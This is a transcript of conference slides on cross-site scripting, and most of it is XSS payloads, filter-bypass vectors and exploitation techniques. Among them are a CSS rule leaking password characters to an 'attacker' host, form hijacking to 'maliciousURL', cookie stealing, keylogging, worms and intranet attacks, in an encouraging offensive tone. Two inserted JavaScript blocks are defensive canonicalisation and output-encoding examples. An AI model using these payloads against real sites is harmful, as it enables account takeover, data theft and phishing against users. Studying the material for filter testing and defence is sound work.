XSS is more than a simple threat

XSS is more than you can imagine. You should take a look.

Published in Education
Transcript

  • 1. XSS is more than a simple threat
    • Avădănei Andrei
    • Software Developer, Blogger, Student
    • www.worldit.info
    • @AndreiAvadanei
    • [email_address]
    • #RoCyberCon @20 february
  • 2. Introduction to XSS
    • Short story
    • XSS types
    • Shouts
  • 3. Short story
    • XSS
    • - it's a client-side vulnerability
    • - … but can become a server-side one
    • - based on JavaScript injection
    • - … and HTML, Java, ActiveX, VBScript, Flash, JSON and so on
    • - is the second most popular threat in 2010 (via Infosec & OWASP)
    • - with many resources available on the Internet (use Google)
  • 4. XSS Types
    • Non-persistent (reflected)
    • - the most common type of XSS injection
    • - requires server-side interpretation of the query
    • - a third party is required
    • Persistent (stored)
    • - the most dangerous type of XSS injection
    • - requires server-side interpretation of the query and data storage
    • - a third party may not be required
    • DOM-based
    • - the newest type of XSS injection
    • - requires client-side interpretation
    • - usually non-persistent
  • 5. Shouts #1 – XSS Amazon
  • 6. Shouts #2 XSS Facebook
  • 7. Shouts #3 XSS Google
  • 8. Shouts #4 XSS Ebay
  • 9. Shouts #5 More XSS'ed
    • Twitter, MySpace, Hi5, Wordpress, Yahoo, Joomla, PhpBB, Drupal, e107, WorldIT.info, PHP-Nuke, PHP-Fusion, *.edu, *.gov, NASA, Youtube, Blogspot, Symantec, Kaspersky, NOD32, browser plugins etc. etc. etc. etc.
  • 10. Getting XSS'ed
    • Where?
    • Basic XSS'ing
    • Advanced XSS'ing
    • HTML 5 XSS'ed
    • Bypass XSS protection
  • 11. Where? Everywhere
    • Rule: "Do not trust anything, ever, especially when it comes to user input."
    • XSS vulnerabilities can be found in anything that comes from the user.
    • GET, POST, COOKIE, FILES, SERVER and headers are the main targets.
    • Try to be clever.
  • 12. Basic XSS'ing
    • <script>alert(1)</script> //basic
    • "><script>alert(1)</script> //break out of an open tag
    • <!--<img src="--><img src=x onerror=alert(1)//"> //bypass & generate an error
    • " onmouseover="alert(1)" //any JavaScript event handler
    • alert(/XSS/.source) or alert( String(/Test/).substr(1,4) ); //some other simple vectors
    • <script>alert(String.fromCharCode(88,83,83));</script> //bypass quote filters
    • <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> //character-reference injection; UTF-8, hex, decimal or octal encoding may work
    • <meta http-equiv="refresh" content="0;url=http://;javascript:..."> // evasion
    • <style type=text/javascript>alert('xss')</style> //JavaScript injection based on the style tag
    • "><img src="x:x" onerror="alert(0)"> // :D
    • […]
  • 13. Advanced XSS'ing
    • <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
    • <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
    • <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> //background & unicode escapes
    • exp/*<A STYLE='noxss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'> //send IE into a loop
    • <XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> //XSS in an XML data island
    • x='\x61\x6c\x65\x72\x74\x28\x31\x29'; new Function(x)(); //something different from everyday injections
    • Function('a\x6cert(1)')(); // ;)
    • x=eval,1,1,1;1; 1,1,1,b='\\',1,1,1; 1,1,1,s='\'',1,1,1;1,1,1,o='0',1,1,1; x( x(s+b+141+b+154+b+145+b+162+b+164+b+o+50+b+o+61+b+o+51+s) ); //eval + octal escape injection
    • [...]
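As an added example (not from the slides or the speaker), this is the canonicalisation a detection rule needs before it matches anything: the encodings used on slides 12 and 13 are decoded to the plain text they stand for, so a filter that only looks for literal `<script` or `javascript:` is no longer the weak point. Function names and the rule itself are my assumptions.

```javascript
// Added example, not from the slides: canonicalise a request parameter before a
// detection rule matches it (numeric character references, \x / octal escapes,
// String.fromCharCode and comment splitting all collapse to plain text).

const cp = (n) => (n <= 0x10ffff ? String.fromCodePoint(n) : '');

// HTML numeric character references: &#106; (decimal) and &#x2F; (hex).
function decodeHtmlEntities(s) {
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => cp(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => cp(parseInt(d, 10)));
}

// JavaScript string escapes: \x61, \u0061 and octal \141.
function decodeJsEscapes(s) {
  return s
    .replace(/\\x([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/\\u([0-9a-f]{4})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/\\([0-7]{1,3})/g, (_, o) => String.fromCharCode(parseInt(o, 8)));
}

// String.fromCharCode(88,83,83) with a literal argument list folds to XSS.
function foldFromCharCode(s) {
  return s.replace(/String\.fromCharCode\(([\d\s,]+)\)/g, (_, list) =>
    String.fromCharCode(...list.split(',').map((n) => parseInt(n, 10))));
}

// Percent-decoding that tolerates malformed sequences.
function urlDecode(s) {
  try { return decodeURIComponent(s); } catch (e) { return s; }
}

// Decode until the string stops changing (catches double encoding), then drop
// HTML comments used to split keywords ("javas<!-- -->cript").
function canonicalize(input) {
  let prev, cur = String(input);
  do {
    prev = cur;
    cur = foldFromCharCode(decodeJsEscapes(decodeHtmlEntities(urlDecode(cur))));
    cur = cur.replace(/<!--[\s\S]*?-->/g, '');
  } while (cur !== prev);
  return cur;
}

// Rule applied to the canonical form only: script tag, javascript: URL, inline event handler, eval or Function.
const SUSPICIOUS = /<script|javascript\s*:|\bon[a-z]+\s*=|\beval\b|\bFunction\s*\(/i;
function isSuspicious(input) {
  return SUSPICIOUS.test(canonicalize(input));
}
```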
  • 14. HTML 5 XSS'ed
    • - new technologies, new problems
    • <video onerror="javascript:alert(1)"><source> //new tag
    • <audio onerror="javascript:alert(1)"><source> //another new tag
    • <form id=test onforminput=alert(1)> <input> </form> <button form=test onformchange=alert(2)>X //new events
    • <div draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'Evil payload')"> <h3>DRAG ME!!</h3> </div> //new functions, events & attributes
    • <input type="text" AUTOFOCUS onfocus=alert(1)>
    • <script>alert(localStorage.getItem('foo'))</script> //access local storage
    • "><script>(history.pushState({},'','index.php'))(document.forms[0].action='http://maliciousURL')</script> //conceal the real location and replace it with anything we want. Ex: http://bit.ly/pushStateXSS
  • 15. Bypass XSS protection
    • <img/src="mars.png"alt="mars"> //no white spaces, use / instead
    • <object data="javascript:alert(0)"> //avoid src
    • <isindex type=image src=1 onerror=alert(1)> //did you know the isindex tag?
    • <img src=x:alert(alt) onerror=eval(src) alt=0> //another bypass based on error generation
    • location=location.hash.slice(1); //avoid the #
    • http://victim.com?param=";location=location.hash)//#0={};alert(0) //payload after the hash in the URL; the victim won't see the true payload
    • alert(document.cookie) or alert(document['cookie']) or with(document)alert(cookie) //same results
    • ""+{toString:alert} or ""+{valueOf:alert} //executes a function without using () or =
    • Future tricks in HTML 5
    • </a onmousemove="alert(1)"> //HTML 5 will support events in closing tags
    • <style>input[name=password][value*=a]{background:url('//attacker?log[]=a');}</style> //pure CSS-based XSS
    • data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg== //avoid using the plain text/html value
    • ?injection=<script+&injection=>alert(1)></script> //HPP, popular in SQLi
    • via BlackHat Conferences.
  • 16. XSS Injection Exploitation (part 1)
    • Redirection
    • Clickjacking
    • URL Spoofing
    • Session hijacking
    • Cookie stuffing
    • Ad Hijacking
    • CSRF/XSRF attacks
    • History stealing
    • XSS Defacement
    • Key & Mouse logging
  • 17. Redirection & Clickjacking
    • Redirection
    • redirect your victim, e.g. document.location = "http://www.your-evil-site.com";
    • you create fake traffic
    • popular
    • Clickjacking
    • describes one website posing as another.
    • e.g. redirecting the victim from an onclick event call
    • used in phishing, gives high credibility
    • extremely popular
  • 18. URL Spoofing
    • popular in phishing
    • the URL is user friendly
    • the web page content is hijacked and all information is sent to websites monitored by the thief
    • extremely popular
  • 19. Session Hijacking
    • also known as "Cookie Stealing"
    • usually done with document.cookie
    • helps you gain control over another logged-in session
    • needs a cookie grabber
    • for instance, an XSS in *.yahoo.com can help you hijack Yahoo accounts
    • extremely popular
  • 20. Cookie stuffing
    • also known as cookie dropping
    • used in blackhat online marketing
    • generates illegitimate affiliate sales by hijacking cookies
    • uses pop-ups, frames and iframes, images, JavaScript, stylesheets or Flash to accomplish the cookie dropping
    • popular
  • 21. Ad Hijacking
    • used in blackhat online marketing
    • usually requires persistent XSS
    • you can replace ad scripts with your own, getting paid when a user clicks on the hijacked ads
    • popular
  • 22. CSRF/XSRF attacks
    • unauthorized commands are transmitted from a user that the website trusts.
    • usually used along with <img src="">.
    • for instance, if <img src="http://victim.com/?do=logout" /> is permanently injected and a user accesses the page with the malformed content, he will be forced to log out.
    • use your imagination, you can do more than that.
  • 23. History Stealing
    • You can find out which sites the victim has visited using getComputedStyle, as below, after creating a node whose CSS :visited selector sets a custom, known color:
    • document.defaultView.getComputedStyle(link, null).getPropertyValue("color");
    • rarely used, but still important
    • it could be done using the full power of HTML 5
  • 24. XSS Defacement
    • looks like a server-side defaced page
    • … but it's only a client-side deface
    • can create chaos and confusion when used in hacking a website
    • involves changing the HTML content of the page
    • of course, two types: persistent and non-persistent
    • persistent XSS defaces are more dangerous than non-persistent ones
  • 25. Key & Mouse Logging
    • Keylogging
    • - log all keystrokes and send them remotely
    • - document.onkeypress / unsafeWindow.onkeypress events
    • - store keystrokes in a local variable and send them regularly to a remote server
    • Mouse logging
    • - log all mouse moves and send them remotely
    • - document.onmousemove event
    • - dangerous but not so popular
  • 26. Tired?
    • You shouldn't be, because this is only the beginning...
  • 27. XSS Injection Exploitation (part 2)
    • Browser hijacking
    • Port Scanning
    • DDoS
    • XSS Tunneling
    • Distributed Password Cracking
    • Worms (Spreading)
    • Arbitrary file execution & Privilege escalation
    • Intranet Hacking
  • 28. Browser Hijacking
    • Also known as Tab Hijacking.
    • Highly recommended when the hacker wants a second shot at victims.
    • XSS Shells usually do it for you
    • With iframe injection
    • Works until the victim closes the tab.
    • The only drawback of this method is that the URL bar does not change with each click, which may or may not be noticeable to the user.
  • 29. Distributed port scanning
    • Cross-domain XMLHttpRequests and WebSockets allow remote port scanning; using XSS you can do distributed remote port scanning
    • The latest Firefox, Chrome and Safari already support these new technologies
    • This option isn't available yet but will be in the next generation of XSS Shell
    • Firefox & Safari connection time is less than 100 ms
    • 1 victim – 65,000 scanned ports – 6,500 seconds
    • 100 victims – 65,000 scanned ports – 6,5 seconds
    • What about 1,000 or 10,000 victims?
  • 30. DDoS
    • Based on WebSockets
    • Application-level DDoS attacks (layer 7 DDoS)
    • Cross Origin Requests (COR) are processed even if the site restricts them, so the request still creates load on the server
    • 1 minute – 1 browser – 10,000 requests / minute using COR WebWorkers with GET requests
    • 1 minute – 600 browsers – over 100,000 requests / minute can be enough to shut down a target
    • We should wait for the majority of the world's browsers to upgrade
    • But blackhat teams will be prepared with amazing tools for DDoS
  • 31. XSS Tunneling
    • An XSS Channel is an interactive communication channel between two systems which is opened by an XSS attack.
    • At the technical level, it may be an Ajax application. Node.js and Comet Push can make a difference in future XSS Shells.
    • XSS Tunneling is the tunneling of HTTP traffic through an XSS Channel to use virtually any application that supports HTTP proxies.
    • XSS Tunnel is a standard HTTP proxy which sits on the attacker's system.
    • You can tunnel all your traffic through an XSS Channel.
    • You can build your own SSH-like protocol.
    • You can forget about the user session problem when hijacking is not possible because of an IP address restriction.
    • Again, your imagination is the limit.
  • 32. Distributed Password Cracking
    • JavaScript engines are becoming very fast.
    • And we have WebWorkers.
    • Password guessing rates in JavaScript tools reach 100,000 MD5 hashes/second.
    • ~100 machines running the JavaScript distributed password cracking program can match the cracking rate of one machine running a similar program written in native code.
    • But these days spreading methods are very effective. Why not 10,000 compromised machines?
    • Ravan - a JavaScript distributed password cracker that uses HTML5 WebWorkers.
    • Performs password cracking in background JavaScript threads.
    • Supports salted MD5 and SHA hashes.
  • 33. Worms (spreading)
    • One of the most efficient environments for worm propagation - social networking
    • XSS Warhol Worm
    • Linear XSS Worm
    • Hydra XSS Worm
    • Samy (2005) infected over 1,000,000 users on MySpace in 20 hours
    • Yahoo!, Hi5, Twitter and Facebook could easily be the next targets on a larger scale.
    • You can simply attach a trojan to your worm, and the risk of creating permanent zombies grows.
  • 34. Arbitrary file execution
    • In 2008 a vulnerability which affected IE 7 & IE 8 could execute arbitrary files with some social engineering skills.
    • During the last years a few other similar vulnerabilities appeared in the Internet jungle.
    • Still, an XSS vulnerability plus a CSRF vulnerability in an administrator file editor, whose protection can be bypassed with same-origin XMLHttpRequests, is the right combination: the XSS vulnerability has become arbitrary code execution (privilege escalation).
    • What are you waiting for? Find the next major privilege escalation vulnerability.
  • 35. Intranet Hacking (part 1)
    • Web browsers can be completely controlled by any Web page, enabling them to become launching points to attack internal network resources. Why?
  • 36. Intranet Hacking (part 2)
    • Exploit procedures :
    • A victim visits a malicious Web page or clicks a nefarious link; embedded JavaScript malware then assumes control over their Web browser.
    • JavaScript malware loads a Java applet revealing the victim’s internal NAT IP address.
    • Then, using the victim’s Web browser as an attack platform, the JavaScript malware identifies and fingerprints Web servers on the internal network.
    • Attacks are initiated against internal or external Web sites, and compromised information is sent outside the network for collection.
  • 37. Intranet Hacking (part 3)
    • Collecting information:
    • Obtaining the NAT'ed IP Address – MyAddress, a special Java Applet
    • Port scanning - <script src=http://ip/></script>
    • Blind Web Server Fingerprinting - explore the use of unique image URLs, CSS or JavaScript files to perform fingerprinting.
      • <img src="http://intranet_ip/unique_image_url" onerror="fingerprint()" />
    • Attack the intranet
      • - try different well-known vulnerabilities
      • - try hacking the web interface of DSL routers
      • - load local files using file:///
      • - get help from XSS Shells
  • 38. Preventing XSS attacks
    • Filtering
    • Input / Output encoding
    • Web browser security
      • - select a safer browser (Chrome)
      • - use a virtual machine for suspicious links
      • - pay more attention to shortened URLs
      • - use plugins for better security (like NoScript)
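As an added example (not from the slides or the speaker), the two server-side measures on this slide side by side: a naive blacklist filter, which the vectors from slide 12 walk straight through, and context-specific output encoding, which keeps the template's markup intact whatever the value contains. The function names and the three-context template are my assumptions.

```javascript
// Added example, not from the slides: slide 38's "filtering" as a naive blacklist,
// beside context-specific output encoding, exercised with vectors from slide 12.

// Blacklist filter: removes <script> tags and the javascript: scheme, nothing else.
function blacklistFilter(input) {
  return input.replace(/<\/?script[^>]*>/gi, '').replace(/javascript:/gi, '');
}

// Encoding for HTML element content (text between tags).
const HTML_MAP = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;', '/': '&#x2F;' };
function encodeForHtml(s) {
  return s.replace(/[&<>"'\/]/g, (c) => HTML_MAP[c]);
}

// Encoding for a quoted attribute value: every non-alphanumeric becomes &#NN;.
function encodeForHtmlAttribute(s) {
  return s.replace(/[^A-Za-z0-9]/g, (c) => '&#' + c.charCodeAt(0) + ';');
}

// Encoding for a JavaScript string literal inside <script>: \uXXXX for every
// non-alphanumeric, so no quote or "</script>" can end the literal or the block.
function encodeForJsString(s) {
  return s.replace(/[^A-Za-z0-9]/g, (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Render one untrusted value into the three output contexts of a fixed template.
function render(untrusted) {
  return {
    body: '<p>' + encodeForHtml(untrusted) + '</p>',
    attribute: '<input value="' + encodeForHtmlAttribute(untrusted) + '">',
    script: "<script>var q='" + encodeForJsString(untrusted) + "';</script>",
  };
}

// Structural check: the output must hold exactly the delimiters the template itself
// contributes (two tags in body; one tag and two quotes in the attribute; two tags
// and two quotes in the script), i.e. the untrusted value added no markup.
const count = (s, re) => (s.match(re) || []).length;
function templateIntact(untrusted) {
  const r = render(untrusted);
  return count(r.body, /</g) === 2 &&
    count(r.attribute, /</g) === 1 && count(r.attribute, /"/g) === 2 &&
    count(r.script, /</g) === 2 && count(r.script, /'/g) === 2;
}
```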
  • 39. XSS: is it still a simple threat?
    • :)
  • 40. Questions?
    • Thanks. :)
  • 41. Bibliography
    • Experience & Google.